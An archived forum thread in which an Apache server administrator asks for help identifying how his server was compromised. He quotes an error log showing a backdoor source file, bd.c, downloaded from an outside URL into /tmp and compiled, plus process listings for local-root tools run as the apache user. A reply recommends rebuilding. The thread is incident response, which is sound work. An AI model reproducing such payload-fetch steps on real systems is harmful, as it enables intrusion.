Need help to identify (apache?) exploit...

This is a discussion on Need help to identify (apache?) exploit... within the Apache Web Server forums, part of the Web Server and Related Forums category; My Related URL References: [http://www.webhostingtalk.com/showth...readid=169024] and [http://www.experts-exchange.com/Secu...20691048.html] ...


Go Back   Usenet Forums > Web Server and Related Forums > Apache Web Server

Reload this Page Need help to identify (apache?) exploit...

FAQ Members List Calendar Search Today's Posts Mark Forums Read

 

 

LinkBack Thread Tools Search this Thread Display Modes
  #1 (permalink)  
Old 08-01-2003
Jason Vance
 
Posts: n/a
Default Need help to identify (apache?) exploit...
My Related URL References:
[http://www.webhostingtalk.com/showth...readid=169024] and
[http://www.experts-exchange.com/Secu...20691048.html]



I need help identifying an unknown exploit of some kind that allowed a
remote attacker to gain control of the apache user, and compile a back door
program in the /tmp directory (
http://www.myxpls.hpg.com.br/exploit/locais/bd.c) found in error_log here:



--error_log snippet--



sh: option `-c' requires an argument

--20:06:54-- http://www.myxpls.hpg.com.br/exploit/locais/bd.c

=> `bd.c'

Resolving www.myxpls.hpg.com.br... done.

Connecting to www.myxpls.hpg.com.br[200.226.137.9]:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 1,828 [text/plain]



0K . 100% 1.74
MB/s



20:06:54 (1.74 MB/s) - `bd.c' saved [1828/1828]



bd.c: In function `main':

bd.c:77: warning: comparison between pointer and integer



--error_log snippet--



When I stepped in the user was running the backdoor as the apache user in
memory disguised as httpd and further re-ran the backdoor program
(/tmp/localroot) and (/tmp/ptrace) shown from 'ps waux' below:



apache 32744 0.0 0.0 1364 272 ? S Jul25 0:00 ./ptrace

apache 32767 98.6 0.0 1348 288 ? R Jul25 378:36 ./localroot

apache 317 0.0 0.0 1348 296 ? S Jul25 0:00 httpd



I thought I was all about security until this happened. I was up2date,
firewalled, all services/ports not being used I've turned off, CGI suexec'd,
php_safe_mode=true, etc... before this happened.



I've looked for .bash_history files, scanned apache logs ( both SSL and
error_logs and client access_logs ), /var/log/messages, recently uploaded
client files, recently added files to the system, recently modified system
files, etc... for anomolies ( SEGFAULTs, SIGHUPs, PHP, forum board abuse ),
and compared md5sum of system binaries with uninfected systems all for
naught! The only pieces of information I have of how this exploit occurred
was in the apache error_log snippet above.



Does anyone have experience with this sort of thing?
  #2 (permalink)  
Old 08-01-2003
mg ©
 
Posts: n/a
Default Re: Need help to identify (apache?) exploit...
"Jason Vance" <jason@vancetech.com> wrote in message
news:vij80qa91u2845@corp.supernews.com...

> Does anyone have experience with this sort of thing?

Excellent post, what exactly do you want help with. I'll admit I've not checked
your related links, but if you define what exactly the problem is atmo others
may be able to help. What OS, Apache version would be a good start. Depending on
how important the box is, I'd be up all night rebuilding if it were me. Rebuild
= format.
 
Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes
Linear Mode Linear Mode

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are Off
[IMG] code is Off
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On



All times are GMT +1. The time now is 10:32 PM.

Contact Us - Usenet Forums - Archive - Top

Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.0.0